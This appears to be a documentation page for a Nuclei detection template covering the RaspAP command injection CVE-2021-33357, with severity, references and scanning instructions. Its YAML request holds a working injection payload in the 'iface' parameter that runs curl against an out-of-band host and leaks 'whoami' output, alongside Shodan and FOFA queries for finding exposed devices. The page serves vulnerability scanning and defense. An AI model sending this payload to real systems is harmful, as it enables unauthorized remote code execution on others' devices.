RaspAP <=2.6.5 - Remote Command Injection
ID: CVE-2021-33357
Severity: critical
Author: pikpikcu,pdteam
Tags: cve2021,cve,rce,raspap,oast
Description
Section titled “Description”RaspAP 2.6 to 2.6.5 allows unauthenticated attackers to execute arbitrary OS commands via the “iface” GET parameter in /ajax/networking/get_netcfg.php, when the “iface” parameter value contains special characters such as ”;”.
YAML Source
Section titled “YAML Source”id: CVE-2021-33357
info: name: RaspAP <=2.6.5 - Remote Command Injection author: pikpikcu,pdteam severity: critical description: | RaspAP 2.6 to 2.6.5 allows unauthenticated attackers to execute arbitrary OS commands via the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";". impact: | Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the integrity and confidentiality of the affected system. remediation: | Upgrade RaspAP to a version higher than 2.6.5 to mitigate the vulnerability. reference: - https://checkmarx.com/blog/chained-raspap-vulnerabilities-grant-root-level-access/ - https://gist.github.com/omriinbar/52c000c02a6992c6ce68d531195f69cf - https://github.com/RaspAP/raspap-webgui - https://nvd.nist.gov/vuln/detail/CVE-2021-33357 - https://github.com/20142995/Goby classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-33357 cwe-id: CWE-78 epss-score: 0.96707 epss-percentile: 0.99648 cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: raspap product: raspap shodan-query: http.favicon.hash:-1465760059 fofa-query: icon_hash=-1465760059 tags: cve2021,cve,rce,raspap,oast
http: - method: GET path: - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http"
- type: word words: - "DHCPEnabled"
extractors: - type: regex group: 1 regex: - 'GET \/([a-z-]+) HTTP' part: interactsh_request# digest: 490a00463044022031da7601ac2ea1b158c1d58058dcf6c9bbd2efddfb47e9d7709a6a7aa428ef9a02201154a6c9688f7a72a595c0b535604e32f4ccfe237c403e9779ea88d723aa87ed:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-33357.yaml"